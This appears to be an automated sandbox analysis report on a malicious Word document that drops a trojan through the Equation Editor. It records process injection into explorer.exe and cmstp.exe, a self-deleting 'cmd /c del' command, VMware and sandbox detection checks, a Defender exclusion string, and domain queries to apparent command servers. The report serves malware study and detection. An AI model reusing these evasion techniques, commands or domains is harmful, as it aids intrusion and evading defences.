          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02010048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02010060 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02010078 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020110D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0201010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02011148 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020101D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02011930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02010C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0200FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02011D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000A85D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000A8680 NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000A8700 NtClose,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000A87B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000A85CA NtCreateFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000A86FA NtClose,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000A87AA NtAllocateVirtualMemory,
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.drOLE indicator has summary info: false
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exeMemory allocated: 76E90000 page execute and read and write
          Source: ashlyzx[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: ashlkyvc7592.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe"
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$O-5433ERE.docJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD883.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@9/9@6/4
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.drOLE document summary: title field not present or empty
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.drOLE document summary: author field not present or empty
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.drOLE document summary: edited time not present or 0
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: ashlkyvc7592.exe, ashlkyvc7592.exe, 00000005.00000003.424164499.00000000007B0000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000003.425110861.0000000000910000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000002.462140612.0000000000C20000.00000040.00000001.sdmp, cmstp.exe, cmstp.exe, 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, cmstp.exe, 00000007.00000003.462746039.0000000001E70000.00000004.00000001.sdmp, cmstp.exe, 00000007.00000003.461709967.00000000004F0000.00000004.00000001.sdmp, cmstp.exe, 00000007.00000002.686830161.0000000002180000.00000040.00000001.sdmp
          Source: Binary string: cmstp.pdb source: ashlkyvc7592.exe, 00000005.00000002.461894500.00000000006D9000.00000004.00000020.sdmp, ashlkyvc7592.exe, 00000005.00000002.461761536.00000000003E0000.00000040.00020000.sdmp
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.drInitial sample: OLE indicators vbamacros = False

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: ashlyzx[1].exe.2.dr, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: ashlkyvc7592.exe.2.dr, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.ashlkyvc7592.exe.60000.0.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.2.ashlkyvc7592.exe.60000.0.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.4.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.3.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.5.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.0.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.7.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.2.ashlkyvc7592.exe.60000.0.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.9.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.2.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.1.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 4_2_003412DD push esp; retn 002Dh
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 4_2_00343652 push esp; retn 002Dh
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0041B87C push eax; ret
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0041B812 push eax; ret
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0041B81B push eax; ret
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_004068A0 push es; retf
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0040697C push esi; ret
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00414406 push B75A778Ch; ret
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0041CEBD push ebp; retf
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_0041B7C5 push eax; ret
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00414FF5 push ecx; ret
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00415FFA push ecx; iretd
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00ABDFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0201DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000A4406 push B75A778Ch; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000AB7C5 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000AB81B push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000AB812 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000AB87C push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000968A0 push es; retf
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000A8913 push ds; retn 4797h
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0009697C push esi; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000ACEBD push ebp; retf
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000A5FFA push ecx; iretd
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_000A4FF5 push ecx; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.66317958598
          Source: initial sampleStatic PE information: section name: .text entropy: 7.66317958598
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ashlyzx[1].exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000004.00000002.425463492.0000000002241000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: ashlkyvc7592.exe PID: 1528, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: ashlkyvc7592.exe, 00000004.00000002.425463492.0000000002241000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: ashlkyvc7592.exe, 00000004.00000002.425463492.0000000002241000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000000098604 second address: 000000000009860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 000000000009898E second address: 0000000000098994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1184Thread sleep time: -300000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe TID: 2672Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 2988Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_004088C0 rdtsc
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeThread delayed: delay time: 922337203685477
          Source: ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000006.00000000.443682934.000000000457A000.00000004.00000001.sdmpBinary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_
          Source: explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.443682934.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000c.ex
          Source: explorer.exe, 00000006.00000000.511664775.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000006.00000000.433262826.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_004088C0 rdtsc
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmstp.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00AC26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_020226F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 5_2_00409B30 LdrLoadDll,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.texaszephyr.com
          Source: C:\Windows\explorer.exeDomain query: www.bandhancustomer.com
          Source: C:\Windows\explorer.exeDomain query: www.publicfigure.skin
